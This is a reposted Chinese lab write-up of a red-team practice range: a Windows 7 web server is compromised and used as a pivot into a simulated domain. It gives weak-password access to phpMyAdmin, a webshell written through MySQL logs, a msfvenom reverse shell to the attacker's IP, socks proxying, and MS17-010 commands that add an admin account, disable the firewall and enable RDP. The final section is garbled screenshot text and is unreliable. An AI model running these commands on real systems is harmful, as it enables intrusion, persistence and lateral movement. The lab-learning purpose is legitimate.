资讯动态

[WP]红日域靶场ATTCK红队实战靶场01打靶攻略学习建议踩坑记录个人理解

发布时间:2026/10/3 7:24:00 来源:尧图企业网站定制
2026/10/1一. 实验准备1. 参考学习资料 :多篇博客自行查找, 比如, ATTCK红队评估实战靶场-1(全网最细)_attck实战系列——红队实战(一)红日靶场1配置网络-CSDN博客, ATTCK红队实战靶场01 | Syst1m‘s blog,本篇文章主要跟随syst1m师傅的文章进行学习2. 环境下载 :社区环境, 网盘分享自行下载三个靶机, 就是我们的攻击目标, win7, winserver2008, win2k33. 环境配置(*重点) :(此处截取某位师傅博客中的截图)我们配置环境要知道这个靶场模拟的是啥场景, 这很重要,靶场模拟一个对外开放的Web服务器(Win 7), 借其为跳板打入内网两台机器(winserver 2008 和 win2k3)的场景,所以 :我们需要让攻击机和win7能够相互通信, 模拟正常的公网服务,win7能够与内网机器通信,内网机器之间能够相互通信综上所述 : 一个网路环境需要一个网卡, 那么win7机器需要同时能够与内网和外网通讯, 需要两个网卡, 内网机器只需要内网网卡即可, 详细配置不在这里赘述, 配合AI提问手动跟着其他文章踩坑学习可以学到很多东西(比如说nmcli的使用等, 就是之前踩过的坑, 也是学到的东西)配置完成之后, 攻击者能够先攻击开放公网服务的win7, 夺取机器权限之后再攻击其内网值得注意 : 配置完后win7可以ping其他机器, 但是其他机器都ping不了win7, 这是防火墙在生效, 很正常, 之后攻击者直接用浏览器访问其IP地址能够出现PHP探针页面就成功了我个人的网络环境 :Kali Linux 攻击机: 192.168.1.128(开放网段)(Target1)Win 7: 192.168.52.143(开放网段) 和 192.168.1.143(内网网段)(Target2)W2K3: 192.168.52.141(内网网段)(Target3)Win 8: 192.168.52.138(内网网段)二. 正式实验1. 信息收集(Target1 : win7)1.0 探针信息 :这里获取路径信息还比较轻松, 访问IP直接获得phpStudy探针信息, 其中包含了服务启动的绝对路径, 为后续写入webshell提供所需要的目的地址信息1.1 端口扫描 :1.2 目录扫描 :2. 明确测试 正式攻击(Target1 : win7)2.1 phpmyadmin后台攻击尝试 :(1) 弱口令尝试 admin/admin root/root admin/123456 等等, 必要时可以跑字典, 跑出来了, 是root/root弱口令2.2 进入phpmyadmin后台找进一步攻击手段(1) 从数据库的表格里找一些有意思的信息, 比如说我们发现一个cms平台--newyxcms,admin的password等,图中的md5(168a73655bfecefdb15b14984dd2ad60)解出来是949ba59abbe56e05的, 用这个网站 MD5免费在线解密破解_MD5在线加密-SOMD5 , 目前不需要收费, 不过结果少, 用 md5在线查询,md5加密 需要花钱买这个结果 :((2) 其实这个yxcms的数据库是有对应站点的 : 但是的时候没扫描路径时候没爆出来,点击右上角的登录, 如果使用 admin/949ba59abbe56e05 也无法登录, 让我很迷惑但是 yxcms 是有明确可以利用的漏洞的, 可以利用其写入webshell, 本文不注重记录这条攻击路径(3) 其次, 通过数据库软件本身在某些情况下也可以实现RCE, 越权等等, 本文攻击win7主要依靠数据库软件和phpmyadmin进行webshell写入2.3 phpmyadmin后台操控数据库软件写马执行指令(主要讲解 Syst1m师傅 在ATTCK红队实战靶场01 | Syst1m‘s blog中操作)(1) 初次尝试直接使用 INTO OUTFILE 写入 webshell(写入路径由 1.1.0 可知), 但是 由于 MySQL Server 使用了安全的启动方式(--secure-file-priv 参数), 导致写文件功能无法使用(2) 尝试利用MySQL的日志文件, 在日志文件中写入 webshell,关于MySQL的日志, 你需要了解的 :(provided by DeepSeek 网页版)(2.1) 查询当前日志记录状态,执行语句 : SHOW VARIABLES LIKE %general%;general_log 为 OFF, 则日志自动记录功能未启动,(2.2) 启动日志记录功能, 并且指定日志记录位置为我们需要写入webshell的, webshell管理工具能够连接的路径,执行语句 : SET GLOBAL general_log ON; /* 开启日志自动记录功能 */SET GLOBAL general_log_file C:/phpStudy/WWW/shell.php; /* 直接写入根路径 */再次查看变量, 得知修改已经成功,(3) 执行 select 一句话木马, 能够让一句话木马记录到日志文件, 从而实现webshell写入到日志文件的效果,写入成功了(4) 连接webshell, 拿下 win7 adminstrator, 但不是 system 权限3. 内网信息收集(Target1)3.1 一些windows指令 :whoami : 查看当前用户为管理员(administrator)ipconfig : 发现还存在一个网段(192.168.52.0/24 网段)net config Workstation : 查看当前计算机名称,用户名等详细信息net localgroup administrators : 查看其他管理员systeminfo : 查看系统信息,发现打了4个补丁,当前域为god.org,域服务器名OWA4. 提权system(Target1)4.1 msfvenom生成反连木马并且上传至Target1msfvenom -p windows/meterpreter/reverse_tcp LHOST192.168.1.128 LPORT4444 -f exe -o msf.exe4.2 msfconsole启动反连shell监听use exploit/multi/handlerset PAYLOAD windows/meterpreter/reverse_tcpset LHOST 192.168.1.128set LPORT 4444run4.3 Target1执行msf.exe, msfconsole处理反连, 反弹shell成功, 提权成功msfconsole 中的 getsystem 是啥 :5. 内网横向信息收集(Target1 - Target2, Target3)5.0 识别target1安装的软件回到之前与target1连接的会话, 执行 :run post/windows/gather/enum_applications既然有nmap, 也方便我们直接调用target1的nmap扫描别的主机了5.1 添加路由在 msfconsole 与 Target1 的连接中添加路由(52网段, 内网网段路由),run autoroute -s 192.168.52.0/24添加录路由run autoroute -p查看路由创建隧道, 代理流量进入内网网段 :backgrounduse auxiliary/server/socks_proxyset srvhost 127.0.0.1set srvport 5555set VERSION 4arun -j5.2 探测内网主机use post/windows/gather/arp_scannersessionsset session 1set rhosts 192.168.52.0/24set threads 100exploit非常好, 内网的主机都扫描出来了 :192.168.52.143192.168.52.141192.168.52.138(set session 1 这个如果没看懂就需要去了解msfconsole关于session的概念, 简而言之 : 一个session可以被视作是msfconsole的一个连接, 比如说我们刚才连接了target1, 我们执行set session [session id]就可以切换会话, 执行background就可以退出当前会话)另外, 对于session也有不同的使用时机和用途5.3 内网主机端口扫描(1) 可以用msfconsole自带的模块工具进行扫描(2) 最稳定的, 还需要是直接使用target1本身拥有的程序(nmap)来进行扫描首先在session内执行 :shell进入交互式shell之后, 进入nmap目录, 调用nmap即可cd C:\Program Files (x86)\Nmap也可以使用nmap自己的脚本做漏洞扫描nmap --scriptvuln 192.168.52.141(3) 附加 :如果按照Syst1m师傅的博客, 让nmap通过proxychains来扫描会失败这其实涉及工具本身的流量转发协议, proxychains4工具本身是劫持了流量转发的函数(类似hook), 支持了标准socket api的流量转发, 其只能代理TCP连接, 不能代理原始套接字, 而不能较好支持更底层的流量转发(ping不了)所以如果想让nmap通过proxychains4实现正常的流量转发就需要让流量变成标准的TCP流量,- sT参数就可以解决这个问题,尽管如此, 但是最终测试下来nmap和proxychains4还是无法实现端口扫描功能, 扫不出来结果用nmap本身的流量代理也不行(--proxies)6. 内网攻击(Target1 - Target2)直接用msfconsole提供的nday攻击, 忽略尝试不同的payload的过程, 直接给最终有效的结果use exploit/windows/smb/ms17_010_commanduse auxiliary/admin/smb/ms17_010_commandset rhosts 192.168.52.141optionsexploitset command net user hack 8888! /addrunset command net localgroup administrators hack /addrunset command netsh firewall set opmode modedisable // 这个指令有问题runset command REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /frunset command net stop sharedaccess // 这个关防火墙更底层一些, 停止 SharedAccess 服务Server 2003 的防火墙服务run一次command设置run一次7. 内网攻击(Target1 - Target3)(存疑)(不稳定)这里我踩了很多坑, 琢磨了两天, 和ai交流了很多轮, 最后原因还是很迷, 但是正如syst1m师傅博客中记载, 打法和target2一样的, 但是屡次尝试都报错, 之后我尝试了使用ligolo作为一个vpn软件, 直接让kali创建了一个tun网卡进入了内网网段(kali机到target1), 效果和vpn一样, nmap能扫描, ping 也可以, 记得把msfconsole自己的route删掉, 之后msfconsole会用这个tun虚拟网卡进入内网网段, 流量会稳定很多, 之后在尝试command模块也失败了好几次, 阴差阳错下让ai帮我在target3机器上诊断信息, 之后再次打这个payload就成功了, 原因却不明确ligolo效果截图 :use exploit/windows/smb/ms17_010_eternalblueset rhosts 192.168.52.138set command net user hackrunportfwd add -l 3389 -p 3389 -r 192.168.52.141rdesktop -u hack -p 8888! 127.0.0.1:3389这部分记得比较粗糙, 总之就是用RDP服务让kali连接上target2的桌面, 弹出窗口记得换一下域为ROOT.....(this computer)这一项upload /home/kali/ligolo-ng_agent_0.4.5_windows/ C:\\Windows\\Temp\\frpfrpc, frpsFRP印令定小付012598 KB4013429C:\Users\liukaifeng01umic qfe list brief I findstr /i KB4012212 KB 3012215 KB4UpdateKB976902GOD\Administrator11/21/2010ct get displayname,productstateERRORC:\Users\liukaifeng01wmic /namespace: \\root\securitycenter2 path antivirusproduDescription Inualid namespaceC:\Users\liukaifeng01sc query windefendSERUICE_NAME: windefendTYPESTATEWIN32_EXIT_CODESERUICE_EXIT_CODECHECKPOINTWAIT_HINT20WIN32 SHARE PROCESSRUNNING(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)0x00x00x00x0)C:\Users\liukaifenge1a

读完文章,也想定制专属网站?

尧图设计师 24 小时内与您沟通定制方案

免费获取报价 →
↑